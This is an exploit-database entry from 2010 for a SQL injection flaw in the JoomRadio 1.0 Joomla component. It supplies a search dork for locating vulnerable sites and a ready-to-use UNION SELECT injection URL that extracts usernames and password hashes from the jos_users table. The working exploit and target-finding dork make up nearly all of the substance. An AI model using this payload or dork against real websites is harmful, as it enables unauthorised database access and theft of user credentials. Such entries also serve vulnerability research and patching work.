Joomla! Component JoomRadio 1.0 - SQL Injection

2010-04-26T00:00:00
ID EXPLOITPACK:5EA472E61ACF068E2656253B449B2B01
Type exploitpack
Reporter Mr.tro0oqy
Modified 2010-04-26T00:00:00

Description

Joomla! Component JoomRadio 1.0 - SQL Injection

                                        
                                            Joomla Component com_joomradio SQL injection vulnerability

author:Mr.tro0oqy from  "community * college"

email:t.4@windowslive.com

greetz:alzomer,Mr.ksoory,my bb ;)

dork: inurl:index.php?option=com_joomradio

exp:

[site]/path/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7+from+jos_users--